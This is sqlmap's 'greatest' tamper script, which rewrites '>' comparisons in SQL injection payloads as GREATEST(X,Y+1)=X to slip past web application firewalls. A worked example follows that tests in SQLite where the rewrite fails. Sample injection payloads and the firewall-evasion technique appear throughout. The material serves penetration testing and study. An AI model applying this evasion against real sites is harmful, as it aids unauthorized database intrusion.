```python
import re


def dependencies():
    # Hook sqlmap calls before using a tamper script; this one needs nothing extra
    pass


def tamper(payload, **kwargs):
    """
    Replaces greater than operator ('>') with 'GREATEST' counterpart

    Tested against:
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls that
          filter the greater than character
        * GREATEST is a widespread SQL function, so this tamper script
          should work against the majority of databases

    >>> tamper('1 AND A > B')
    '1 AND GREATEST(A,B+1)=A'
    """

    retVal = payload

    if payload:
        # Match the first "X > Y" that follows a boolean AND/OR: X is anything
        # up to the '>', Y is a bare word or a single-quoted string. Only the
        # first such comparison is rewritten; '>=' does not match at all.
        match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)

        if match:
            # X > Y holds exactly when X is the larger of X and Y+1, so the
            # '>' character never appears in the payload. The +1 step assumes
            # integer operands; for non-integer or string values the rewritten
            # condition can evaluate differently from the original.
            _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(3), match.group(4), match.group(3))
            retVal = retVal.replace(match.group(0), _)

    return retVal
```
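As an added worked example (not part of sqlmap's greatest.py), the Python below reproduces the same regex rewrite and then checks, over constructed operand pairs in an in-memory SQLite database, where GREATEST(X,Y+1)=X actually agrees with X > Y. SQLite has no GREATEST of its own (its equivalent is the multi-argument max(X,Y)), so a two-argument GREATEST with MySQL-style NULL handling is registered through create_function; the predicate, the table layout and the operand pairs are all constructed for this example.

```python
import re
import sqlite3

# The rewrite performed by sqlmap's greatest.py, reproduced here so the
# example runs on its own (same regex, same substitution).
GT_PATTERN = re.compile(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')")


def rewrite_gt(payload):
    """Rewrite the first 'X > Y' after a boolean AND/OR as GREATEST(X,Y+1)=X."""
    match = GT_PATTERN.search(payload)
    if not match:
        return payload  # '>=' or a '>' not preceded by AND/OR is left untouched
    replacement = "%sGREATEST(%s,%s+1)=%s" % (
        match.group(1), match.group(3), match.group(4), match.group(3))
    return payload.replace(match.group(0), replacement)


def greatest(x, y):
    """Two-argument GREATEST with MySQL semantics: NULL if either side is NULL."""
    if x is None or y is None:
        return None
    return max(x, y)


def open_db():
    # Assumption for this example: SQLite lacks GREATEST (it uses max(X,Y)),
    # so register one under that name to let the tampered predicate execute.
    conn = sqlite3.connect(":memory:")
    conn.create_function("GREATEST", 2, greatest)
    return conn


def holds(conn, predicate, a, b):
    """Evaluate a WHERE predicate over a constructed one-row table (a, b)."""
    sql = "SELECT 1 FROM (SELECT ? AS a, ? AS b) WHERE " + predicate
    return conn.execute(sql, (a, b)).fetchone() is not None


ORIGINAL = "1 AND a > b"          # constructed boolean-based payload
TAMPERED = rewrite_gt(ORIGINAL)   # '1 AND GREATEST(a,b+1)=a'

# Constructed operand pairs: integers on both sides of the boundary, an
# equal pair, and a non-integer pair where the +1 step is too coarse.
CASES = [(5, 3), (4, 3), (3, 3), (2, 3), (-1, -2), (2.5, 2)]


def compare(cases=CASES):
    """Return (a, b, original_result, tampered_result) for each operand pair."""
    conn = open_db()
    try:
        return [(a, b, holds(conn, ORIGINAL, a, b), holds(conn, TAMPERED, a, b))
                for a, b in cases]
    finally:
        conn.close()


def mismatches(cases=CASES):
    """Operand pairs on which the tampered predicate disagrees with the original."""
    return [(a, b) for a, b, orig, tamp in compare(cases) if orig != tamp]


if __name__ == "__main__":
    for payload in ("1 AND A > B", "1 OR id > 10", "1 AND username > 'admin'",
                    "1 AND a >= b", "1 AND a > b OR c > d"):
        print("%-28s -> %s" % (payload, rewrite_gt(payload)))
    for a, b, orig, tamp in compare():
        flag = "" if orig == tamp else "   <-- differs"
        print("a=%-4s b=%-4s  a>b=%-5s  tampered=%-5s%s" % (a, b, orig, tamp, flag))
```

The comparison shows the point a tester needs to keep in mind: the rewrite is exact for integer operands, but on (2.5, 2) the original condition is true while GREATEST(2.5, 3)=2.5 is false, and a string operand such as 'admin' yields 'admin'+1, whose value depends on the engine's implicit casting. Two further limits are visible in the payload listing: only the first comparison after an AND/OR is rewritten (the trailing c > d keeps its '>'), and '>=' is not matched at all, so those cases still reach the filter unchanged. GREATEST is also not universal: SQLite does not have it, and Microsoft SQL Server only added GREATEST/LEAST in SQL Server 2022.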